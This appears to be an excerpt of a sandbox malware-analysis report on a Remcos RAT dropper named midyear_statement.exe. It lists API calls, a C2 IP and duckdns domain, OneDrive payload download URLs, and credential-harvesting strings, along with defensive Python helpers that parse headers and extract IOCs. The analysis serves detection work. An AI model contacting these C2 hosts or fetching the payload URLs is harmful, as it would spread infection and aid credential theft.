                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_040A5878
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,24_2_00401612
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,24_2_0040128D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339253
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,24_2_1234C291
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,24_2_1233C34D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339665
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,24_2_12349AF5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233783C FindFirstFileW,FindNextFileW,24_2_1233783C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,24_2_1233880C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1237E879 FindFirstFileExA,24_2_1237E879
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,24_2_1233BD37
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,24_2_146410F1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14646580 FindFirstFileExA,24_2_14646580
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,27_2_0040AE51
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,24_2_12337C97
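The static PE row above lists the COFF Characteristics flags by name. The following is an added example (not code from the report or from Joe Sandbox) that turns that list back into the raw Characteristics word, reads the field from a PE header so the claim can be re-checked against the sample, and tests for the BYTES_REVERSED_LO/HI pair, a deprecated flag combination that Borland/Delphi linkers set and Microsoft's linker does not. The `build_stub` header is constructed here for an offline check and is not the sample.

```python
"""
Decode and re-check the COFF Characteristics listed for midyear_statement.exe.
Added example; not code from the report or from Joe Sandbox.
"""
import struct

# IMAGE_FILE_* bit values from the PE/COFF specification.
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0010: "AGGRESSIVE_WS_TRIM",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x0400: "REMOVABLE_RUN_FROM_SWAP",
    0x0800: "NET_RUN_FROM_SWAP",
    0x1000: "SYSTEM",
    0x2000: "DLL",
    0x4000: "UP_SYSTEM_ONLY",
    0x8000: "BYTES_REVERSED_HI",
}
# Flag names exactly as the report's static PE row lists them.
REPORTED = ["EXECUTABLE_IMAGE", "LINE_NUMS_STRIPPED", "LOCAL_SYMS_STRIPPED",
            "BYTES_REVERSED_LO", "32BIT_MACHINE", "BYTES_REVERSED_HI"]


def decode_characteristics(value):
    """Flag names set in a Characteristics word, in ascending bit order."""
    return [name for bit, name in sorted(CHARACTERISTICS.items()) if value & bit]


def encode_characteristics(names):
    """Inverse of decode_characteristics: flag names -> Characteristics word."""
    by_name = {name: bit for bit, name in CHARACTERISTICS.items()}
    return sum(by_name[n] for n in names)


def read_characteristics(pe_bytes):
    """Characteristics field from the COFF header of an MZ/PE image."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4)
    # PointerToSymbolTable(4) NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    (chars,) = struct.unpack_from("<H", pe_bytes, e_lfanew + 4 + 18)
    return chars


def borland_linker_hint(value):
    """True when both deprecated BYTES_REVERSED flags are set; Borland/Delphi
    linkers set them, Microsoft's linker does not. Consistent with the
    Delphi-built DBatLoader family named in this report."""
    return (value & 0x8080) == 0x8080


def build_stub(characteristics):
    """Constructed minimal MZ/PE header (not a loadable program) for offline checks."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    # On the real sample: read_characteristics(open("midyear_statement.exe", "rb").read())
    value = read_characteristics(build_stub(encode_characteristics(REPORTED)))
    print(hex(value), decode_characteristics(value), borland_linker_hint(value))
```

Run against the real file the word should come back as 0x818E; a mismatch would mean the header was modified after the sandbox run, or that the report row describes a different layer than the file on disk.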

                      Networking

                      Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445
                      Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708
                      Source: Malware configuration extractorURLs: xwww.zuckdgreb.duckdns.org
                      Source: unknownDNS query: name: www.zuckdgreb.duckdns.org
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD1D0 InternetCheckConnectionA,0_2_040BD1D0
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,24_2_1234B380
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
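The rows above mix the Remcos C2 (the Snort check-in pair and the configuration host), the geoplugin.net location lookup, the OneDrive payload fetches and the sandbox's own TLS rows, with each HTTP request repeated and its headers run together. The following is an added example, not Joe Sandbox code, that parses rows in this format into a deduplicated indicator set with a role label. The sample rows are copied from the report rows above; the role labels (c2, stage_download, geolocation_check) are this example's own classification, based on the Snort SIDs, the geoplugin.net host and the WinHttp.WinHttpRequest User-Agent, which is the default UA of the WinHTTP COM object rather than a browser.

```python
"""
Pull blockable/huntable indicators out of Joe Sandbox "Networking" rows.
Added example, not Joe Sandbox code. SAMPLE_ROWS are copied from the report;
the role labels are this example's own classification.
"""
import re
from collections import defaultdict

SAMPLE_ROWS = [
    "Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445",
    "Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708",
    "Source: Malware configuration extractorURLs: xwww.zuckdgreb.duckdns.org",
    "Source: unknownDNS query: name: www.zuckdgreb.duckdns.org",
    "Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache",
    "Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2",
    "Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com",
    "Source: global trafficHTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com",
]

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
# The report runs request headers together with no separator, so a header value
# ends where the next known header name begins, or at end of line.
HDR = r"(?=(?:Host|Connection|Accept|User-Agent|Cache-Control): |$)"
RX = {
    "snort": re.compile(rf"Snort IDS: (\d+) (.+?) ({IP}):(\d+) -> ({IP}):(\d+)"),
    "config": re.compile(r"Malware configuration extractorURLs: (\S+)"),
    "dns": re.compile(r"DNS query: name: (\S+)"),
    "tls": re.compile(rf"HTTPS traffic detected: ({IP}):(\d+) -> ({IP}):(\d+) version: (TLS [\d.]+)"),
    "http": re.compile(r"HTTP traffic detected: ([A-Z]+) (\S+) HTTP/1\.[01](.*)$"),
    "host": re.compile(rf"Host: (.*?){HDR}"),
    "ua": re.compile(rf"User-Agent: (.*?){HDR}"),
}
PRIVATE = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")  # RFC 1918 sandbox side


def parse_row(row):
    """Return (kind, fields) for one report row, or None if it is not network evidence."""
    if m := RX["snort"].search(row):
        sid, msg, src, sport, dst, dport = m.groups()
        return "snort", {"sid": int(sid), "msg": msg, "src": src, "sport": int(sport),
                         "dst": dst, "dport": int(dport)}
    if m := RX["config"].search(row):
        return "config", {"url": m.group(1)}
    if m := RX["dns"].search(row):
        return "dns", {"name": m.group(1)}
    if m := RX["tls"].search(row):
        a, ap, b, bp, ver = m.groups()
        srv, port = (a, ap) if ap == "443" else (b, bp)  # the 443 side is the server
        return "tls", {"server": srv, "port": int(port), "version": ver}
    if m := RX["http"].search(row):
        method, path, headers = m.groups()
        host = RX["host"].search(headers)
        ua = RX["ua"].search(headers)
        return "http", {"method": method, "path": path,
                        "host": host.group(1) if host else None,
                        "ua": ua.group(1) if ua else None}
    return None


def extract_iocs(rows):
    """Deduplicated indicators keyed by role (this example's own labels)."""
    iocs = defaultdict(set)
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        kind, f = parsed
        if kind == "snort":
            # Either direction of the check-in names the C2: keep the non-RFC1918 side.
            peer = (f["src"], f["sport"]) if PRIVATE.match(f["dst"]) else (f["dst"], f["dport"])
            iocs["c2"].add(peer)
            iocs["snort_sid"].add(f["sid"])
        elif kind == "config":
            iocs["c2_domain_from_config"].add(f["url"])
        elif kind == "dns":
            iocs["dns"].add(f["name"])
        elif kind == "tls":
            iocs["tls_server"].add((f["server"], f["port"]))
        elif kind == "http":
            url = f"http://{f['host']}{f['path']}"
            if f["host"] == "geoplugin.net":
                iocs["geolocation_check"].add(url)  # Remcos profiles the victim's location here
            elif f["ua"] and "WinHttp.WinHttpRequest" in f["ua"]:
                iocs["stage_download"].add((url, f["ua"]))  # WinHTTP COM object, not a browser
            else:
                iocs["http_other"].add(url)
    return dict(iocs)


if __name__ == "__main__":
    for role, items in extract_iocs(SAMPLE_ROWS).items():
        print(role, sorted(items, key=str))
```

The configuration extractor row keeps its leading "x" as printed; the DNS row shows the host the sample actually resolved, so both are kept rather than normalising one into the other. Feed the real report's rows in place of SAMPLE_ROWS to get the full set, and treat the OneDrive URLs as retrieval indicators to hunt on rather than hosts to block.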
                      Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
                      Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 0000001B.00000002.1406582942.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
                      Source: wkrriuhD.pifString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: onedrive.live.com
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhv348F.tmp.27.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
